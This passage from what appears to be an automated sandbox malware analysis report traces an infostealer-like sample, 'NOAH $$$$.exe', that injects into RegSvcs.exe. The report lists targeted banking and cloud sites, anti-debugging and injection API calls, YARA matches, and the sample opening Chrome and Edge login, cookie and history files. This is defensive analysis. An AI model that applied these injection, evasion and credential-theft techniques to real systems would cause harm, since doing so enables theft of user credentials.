              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594053Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593935Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593822Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593718Jump to behavior
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: NOAH $$$$.exe, 00000000.00000002.2030317373.00000000008FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: RegSvcs.exe, 00000002.00000002.4474157662.000000000078C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: RegSvcs.exe, 00000002.00000002.4476818594.00000000039E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: RegSvcs.exe, 00000002.00000002.4476818594.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: C:\Users\user\Desktop\NOAH $$$$.exeAPI call chain: ExitProcess graph end nodegraph_0-86814
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05368670 LdrInitializeThunk,2_2_05368670
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_03FCD618 mov eax, dword ptr fs:[00000030h]0_2_03FCD618
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_03FCD5B8 mov eax, dword ptr fs:[00000030h]0_2_03FCD5B8
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_03FCBF68 mov eax, dword ptr fs:[00000030h]0_2_03FCBF68
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3D8008Jump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
              Source: C:\Users\user\Desktop\NOAH $$$$.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\NOAH $$$$.exe"Jump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
              Source: NOAH $$$$.exeBinary or memory string: Shell_TrayWnd
              Source: NOAH $$$$.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,2_2_00417A20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,0_2_0041E364
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4476818594.0000000003721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4475403957.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3688, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.4475403957.000000000278F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3688, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
